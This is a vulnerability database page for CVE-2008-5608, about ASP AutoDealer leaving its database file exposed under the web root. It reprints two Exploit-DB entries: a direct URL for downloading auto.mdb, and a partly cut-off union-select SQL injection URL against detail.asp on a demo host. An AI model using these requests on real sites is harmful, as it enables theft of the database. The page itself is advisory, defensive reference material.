CVE-2008-5608
published 2008-12-16CVE-2008-5608: ASP AutoDealer stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file…
PriorityP335medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
2.85%
85.0th percentile
ASP AutoDealer stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for auto.mdb.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aspapps | asp_autodealer | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ASP AutoDealer - Remote Database Disclosure
exploitdb·2008-12-06
CVE-2008-5608 ASP AutoDealer - Remote Database Disclosure
ASP AutoDealer - Remote Database Disclosure
---
[~] ASPAutoDealer DD Remote Vuln.
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
exp for demo: ( DD )
http://demo.merlix.com/autodealer/auto.mdb
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
note: DD First submission /str0ke
# milw0rm.com [2008-12-06]
Exploit-DB
ASP AutoDealer - SQL Injection / File Disclosure
exploitdb·2008-12-05
CVE-2008-5608 ASP AutoDealer - SQL Injection / File Disclosure
ASP AutoDealer - SQL Injection / File Disclosure
---
###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################
---------------------------- Tunisia Muslim ------------------------------
#found by : OffensiveTrack
#Author : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : Merlix ASP AutoDealer
#download : null
#Demo : http://demo.merlix.com/autodealer/
#Exploits :
--=[SQL INJECTION]=--
http://demo.merlix.com/autodealer/detail.asp?ID=-0+union+select+1,null,null,0,null,CDDoorID,null,null,null,null,CDDoo
No writeups or analysis indexed.
http://securityreason.com/securityalert/4754https://exchange.xforce.ibmcloud.com/vulnerabilities/47124https://www.exploit-db.com/exploits/7356https://www.exploit-db.com/exploits/7360http://securityreason.com/securityalert/4754https://exchange.xforce.ibmcloud.com/vulnerabilities/47124https://www.exploit-db.com/exploits/7356https://www.exploit-db.com/exploits/7360
2008-12-16
Published